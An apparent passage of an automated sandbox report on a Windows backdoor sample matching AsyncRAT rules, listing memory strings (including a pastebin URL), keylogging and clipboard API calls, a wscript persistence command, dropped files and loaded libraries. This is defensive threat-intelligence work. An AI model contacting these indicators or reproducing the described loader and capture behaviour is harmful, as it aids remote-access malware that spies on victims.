Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Telecom.pif, 0000000B.00000000.1216712688.0000000000515000.00000002.00000001.01000000.00000006.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, EcoScape.pif, 00000013.00000000.1232198341.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 0000001D.00000002.1397522322.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 00000027.00000000.1816275149.0000000000515000.00000002.00000001.01000000.00000009.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Commander.0.dr String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, 00000022.00000002.2442532871.0000000002D11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/Dh8E7H3R
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: EcoScape.pif.11.dr, Plugins.0.dr String found in binary or memory: https://www.globalsign.com/repository/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Code function: 0_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004056BB
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004BF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 11_2_004BF7C7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004BF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 11_2_004BF55C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004AA635 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 11_2_004AA635
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004D9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 11_2_004D9FD2

System Summary

Source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004B4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle, 11_2_004B4763
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004A1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 11_2_004A1B4D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Code function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040350A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004AF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 11_2_004AF20D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00468017 11_2_00468017
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0045E144 11_2_0045E144
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0044E1F0 11_2_0044E1F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0047A26E 11_2_0047A26E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004622A2 11_2_004622A2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004422AD 11_2_004422AD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0045C624 11_2_0045C624
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0047E87F 11_2_0047E87F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004CC8A4 11_2_004CC8A4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004B2A05 11_2_004B2A05
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00476ADE 11_2_00476ADE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004A8BFF 11_2_004A8BFF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0045CD7A 11_2_0045CD7A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0046CE10 11_2_0046CE10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00477159 11_2_00477159
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00449240 11_2_00449240
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004D5311 11_2_004D5311
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004496E0 11_2_004496E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00461704 11_2_00461704
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00461A76 11_2_00461A76
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00449B60 11_2_00449B60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00467B8B 11_2_00467B8B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00461D20 11_2_00461D20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00467DBA 11_2_00467DBA
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00461FE7 11_2_00461FE7
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: String function: 00460DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: String function: 0045FD52 appears 40 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Static PE information: invalid certificate
Source: Northeast.0.dr Static PE information: No import functions for PE file found
Source: Northeast.0.dr Static PE information: Data appended to the last section found
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: version.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
